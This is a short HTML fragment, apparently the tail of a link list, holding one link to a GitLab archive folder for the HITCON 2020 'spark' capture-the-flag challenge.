<li><a href="https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/HITCON/2020/spark">https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/HITCON/2020/spark</a></li> </ul>